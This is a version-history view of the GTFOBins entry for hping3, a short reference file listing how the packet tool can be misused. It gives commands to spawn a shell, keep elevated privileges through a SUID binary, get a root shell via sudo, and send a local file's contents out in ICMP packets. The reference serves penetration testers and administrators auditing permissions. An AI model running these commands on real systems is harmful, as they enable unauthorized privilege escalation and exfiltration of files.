GTFOBins.github.io/_gtfobins/hping3.md

21 lines
459 B
Markdown
Raw Normal View History

2020-12-30 08:47:47 +01:00
---
functions:
shell:
- code: |
hping3
2021-01-18 09:19:35 +01:00
/bin/sh
suid:
- code: |
./hping3
/bin/sh -p
2022-09-30 20:02:46 +02:00
file-read:
- description: It is possible to send specific file contents if hping3 has sufficient permission.
- code: |
hping3 --icmp 127.0.0.1 --listen --signature --safe
hping3 --icmp 127.0.0.1 --d 100 --c 2 --sign signature --file ./file.txt
2020-12-30 08:47:47 +01:00
sudo:
- code: |
sudo hping3
/bin/sh
---